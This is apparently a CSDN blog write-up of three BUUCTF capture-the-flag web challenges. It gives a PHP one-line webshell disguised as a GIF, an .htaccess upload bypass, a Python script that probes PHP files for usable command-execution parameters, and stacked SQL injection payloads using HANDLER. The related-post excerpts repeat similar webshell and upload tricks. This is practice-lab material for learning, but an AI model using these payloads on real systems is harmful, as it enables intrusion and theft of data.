BUUCTF 14

最新推荐文章于 2023-06-17 21:35:07 发布
最新推荐文章于 2023-06-17 21:35:07 发布
阅读量197 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52431855/article/details/113248776
版权

知识点 

python编码知识(未学习)

SQL注入知识

HANDLER

handler column_name  open 语句打开一个表 ,使其可以使用

后续 handler column_name read 语句访问,该表对象未被其他会话共享,并且在会话调用handler column_name close 或会话终止之前不会关闭,详情可见

14-1 [MRCTF2020]你传你🐎呢

做题思路

尝试上传一句话木马 

GIF89a
<script language="php">eval($_POST['flag']);</script>

开头是图像的文件头,因为懒得 改了,尝试性的上传

抓包之后改后缀为phtml,

应该是过滤了,然后上传 .htaccess 文件解析图片马

AddType application/x-httpd-php  .jpg

发现不能上传,反应过来可以抓包改 content-type为image/jpeg

最后蚁剑连接http://35e73a9c-824d-4d27-82b4-294747d2b978.node3.buuoj.cn/upload/6243c9a5fa9d97fcc5fe2e59dd985434/w.jpg成功连接,然后找到flag

14-2  [强网杯 2019]高明的黑客

做题思路

根据提示 

于是 来连接 url 到 /www.tar.gz得到文件

打开压缩包,查看源码,发现了很多shell,我却没有找到flag,看WP

发现很多大佬都是利用python脚本找到有效 shell 

大佬脚本 需要在本地搭一个环境,php 7.0以上,否则会报语法错误!

import requests
import sys
import os
import threading
import time

url = "http://127.0.0.1/src/"
files = os.listdir("C://Users//Administrator//Desktop//www//src")
#print(files)

def GetGet(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_GET['") > 0:
			start = i.find("$_GET['") + 7
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def GetPost(file):
	a = []
	f = open("C://Users//Administrator//Desktop//www//src//"+file,'r')
	content = f.readlines()
	for i in content:
		if i.find("$_POST['") > 0:
			start = i.find("$_POST['") + 8
			end = i.find("'",start)
			a.append(i[start:end])
	return a

def Send(start,end):
	start = int(start)
	end = int(end)
	for i in range(start,end):
		i = files[i]
		get = GetGet(i)
		print("Try filename: %s"%i)
		for j in get:
			NewUrl = url+"%s?%s=%s"%(i,j,'echo "Success!!!"')
			s = requests.get(NewUrl)
			if("Success" in s.text):
				print("Success! Url:%s" % (NewUrl))
				break
		post = GetPost(i)
		for j in post:
			NewUrl = url+"%s"%(i)
			s = requests.post(NewUrl,data={j:"echo 'Success!!'"})
			if("Success" in s.text):
				print("Success! Post:%s" % (j))
				break

class myThread (threading.Thread):
    def __init__(self, threadID, name, counter):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name
        self.counter = counter
    def run(self):               
        Send(self.name, self.counter)

for i in range(0,150):
	thread = myThread(i,i*20,(i+1)*20)
	thread.start()

payload

/xk0SzyKwfzw.php?Efa5BVG=%20cat%20/flag

 成功得到flag

 14-3 [GYCTF2020]Blacklist

做题思路

题目提示黑名单,并且疑似注入点,尝试注入,

 发现字节为2

发现了黑名单

想到之前的堆叠注入,尝试一下,1';show databases;show tables;#

得到库名和表名看到有个表FlagHere,查看一下有什么字段 

1';show columns from FlagHere; 

发现了flag,但是我接下来不知道该怎么走。。好气啊

嗯,找WP关于堆叠注入的发现由于禁用了prepare,rename 预处理方法,重命名方法都不行

好吧,直接看大佬payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

 嗯,成功得到flag

 

小杌
关注
BUUCTF [MRCTF2020]你传你呢
墨子辰的博客
02-04 697
考点:.htaccess文件上传 先上传一个正常图片,发现成功上传而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上传。 可能有人到这里就懵了,为什么要上传1.sdga,它是个神马文件类型???? 对,这里我上传了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上传一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上传的招式咯。 看好了 别眨眼·~~~ No.1:上传 .htaccess No.2:上传 .user.ini
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 821
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-pwn(14)
njh18790816639的博客
01-23 3542
gwctf_2019_jiandan_pwn1 简单ret2libc,唯一需要注意的便是注意修改索引值,防止索引被覆盖!从而无法进行栈溢出! from pwn import * from LibcSearcher import LibcSearcher context(os='linux',arch='amd64',log_level='debug') binary = './pwn' r = remote('node4.buuoj.cn',25586) #r = process(binary) elf
PWN-PRACTICE-BUUCTF-14
P1umH0的博客
08-09 160
PWN-PRACTICE-BUUCTF-14bbys_tu_2016ciscn_2019_n_3roarctf_2019_easy_pwngyctf_2020_borrowstack bbys_tu_2016 栈溢出,覆盖eip到printFlag函数 from pwn import * #io=process('./bbys_tu_2016') io=remote('node4.buuoj.cn',27817) elf=ELF('./bbys_tu_2016') #io.recvuntil('feed i
[BUUCTF]你传你呢(writeup)
weixin_63306244的博客
06-17 114
script language="php">eval($_REQUEST[love]) //密码 love。 //a.png是上传的图片马的文件名。### 这里注意目录是不带/var/www/html/的 ###### 先上传图片马再上传.htaccess ###一进门就看到满脸微笑的大师兄。随手就是一个图片马,发现不行。随后就是轻松的得到flag。怎么能让你笑的这么开心。
BUUCTF:[MRCTF2020]你传你呢
末初的CSDN博客
12-03 1719
https://buuoj.cn/challenges#[MRCTF2020]%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2 文件上传 文件后缀过滤的很全,常见的绕过方法php3/5/7/、phtml都不行 但是.htaccess可以上传,只需要修改一下Content-Type为image/jpeg即可上传 .htaccess AddType application/x-httpd-php .jpg 然后上传一个含有一句话的jpg文件即可被当作p
2021-10-14 buuctf SSRFme
shallowskyandsea的博客
10-14 246
SSRFme 打开题目,审计代码 前面一段会返回我们的IP,然后会将"orange"和我们的IP拼接后进行MD5加密 通过url参数输入的内容会以GET命令执行, 执行结果会被存入以filename参数的值命名的文件里 构造读取根目录并创建文件a Payload:/?url=/&filename=a Md5加密后的orange+IP:2ba7fe56ffb251699ec6e09ae00f2e87 查看文件 /sandbox/2ba7fe56ffb251699ec6e09.
buuctf crackrtf
weixin_45701079的博客
10-10 919
buuctf 逆向 crackrtf 首先查壳,没壳。ida打开,发现主函数 代码如下 int __cdecl main_0() { DWORD v0; // eax DWORD v1; // eax CHAR String; // [esp+4Ch] [ebp-310h] int v4; // [esp+150h] [ebp-20Ch] CHAR String1; // [esp+154h] [ebp-208h] BYTE pbData; // [esp+258h] [ebp-1
BUUCTF-WriteUp
鱼的博客
02-01 762
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
buuctf pyre
weixin_45701079的博客
10-10 815
buuctf 逆向pyre 最近看到不少py逆向,记录一道题 下载原件发现是pyc文件,先利用uncompyle生成py文件(之前用py3.8.6的版本下载死活不行,在老学长的帮助下发现uncompyle库不支持最新版本,没办法含泪删掉重下) 下载指令 pip install uncompyle 下载成功后生成py文件,比如想把1.pyc 生成 2.py文件用指令 uncompyle6 1.pyc > 2.py 一般都可以成功,看这道题,用上面的方法得到py文件 # uncompyle6 ve
Buuctf:[MRCTF2020]你传你呢
fcz___的博客
03-11 332
然后你会发现无论你怎么改后缀,怎么改语法,就是无法链接蚁剑。我们就得尝试用.user.iniwen文件或者.htaccess文件把我们传入的php代码执行了。我们也不知道网站目录上有没有php文件所以我们尝试用.htaccess文件。好的,可以看到文件路径为/upload/17f10253549cad63de6355a3b577ad74/a.png。我们打开蚁剑,添加数据。然后我们上传我们的一句话木马文件a.png。我们先上传一个图片试试。然后改文名件改为a.png`然后上传。我们上传.htaccess
BUUCTF——[MRCTF2020]你传你呢 1
weixin_45864041的博客
09-28 1317
先传php文件格式的一句话木马。 上传失败。那就先传jpg文件 发现上传成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上传php文件。 发现上传失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上传.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上传的jpg/.
BUUCTF WEB [MRCTF2020]你传你*呢
Y1da的博客
04-18 346
BUUCTF WEB [MRCTF2020]你传你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上传各种php文件后缀均被过滤,尝试上传.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上传后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
BUUCTF之[MRCTF2020]你传你呢 1】
qq_40646572的博客
10-25 5686
首先,正常上传图片文件,竟然因为文件大小的问题,上传失败,就挺难受。不过还好,总算知道是什么原因不能上传。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
buuctf-[MRCTF2020]你传你呢(小宇特详解)
小宇的web博客
01-26 1493
buuctf-[MRCTF2020]你传你????呢(小宇特详解) 这里先试着修改后缀进行黑名单绕过,然而不行 这里的正确方法是进行.htaccess绕过 这里先上传一个.htaccess文件 <FilesMatch "1.png"> SetHandler application/x-httpd-php </FilesMatch> 注意:这里上传.htaccess文件的时候一定要抓包将content-type的值修改为image/png 然后上传一个1.png <?php
BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9359
BUUCTF之[MRCTF2020]你传你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。 不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)
qq_64201116的博客
05-19 4013
进入页面 文件上传漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
BUUCTF
hao2580的博客
04-11 718
[MRCTF2020]你传你????呢 知识点:文件上传 1.Apache服务器 上传.htaccess 文件,bp抓包 AddType application/x-httpd-php .jpg(将jpg当做PHP解析) 2.MIME类型验证绕过:修改Content-type为:image/jpeg 上传 再上传jpg,蚁剑连上,url http://b29acfc2-511c-4e8d-980...
buuctf web
gudugeji的博客
04-24 364
1.warmup 查看源码 2.随便注 堆叠注入 爆数据库 爆表,有两个表 构造playload:http://6d5326a4-99c2-423f-ab6f-46b44dc1853d.node3.buuoj.cn/?inject=1nject=1%27;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435...
buuctf wireshark
最新发布
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值